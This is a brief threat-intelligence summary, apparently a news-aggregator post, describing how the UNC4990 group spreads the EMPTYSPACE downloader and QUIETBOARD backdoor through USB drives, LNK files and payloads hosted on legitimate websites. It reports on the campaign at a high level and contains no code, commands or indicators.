Summary:

UNC4990, a financially motivated threat actor, is using USB devices to exploit victims. They have been using popular and legitimate websites like GitHub, GitLab, Ars Technica, and Vimeo as part of their tactics. The threat actor uses the EMPTYSPACE downloader and QUIETBOARD backdoor to execute payloads. The infection chain begins with delivering USB drives to victims through social engineering. The victims open a malicious LNK shortcut file that executes a PowerShell script, which fetches the EMPTYSPACE downloader. The threat actor has been making changes to their tactics, such as replacing GitHub with Vimeo and using an image embedded with the payload on Ars Technica. They have also used multiple versions of EMPTYSPACE loader and the Python-based QUIETBOARD backdoor. Host-based IOC and network-based IOC indicators are provided.

Hashtags: #cybersecurity #malware

https://cybersecuritynews.com/usb-malware-with-text-strings/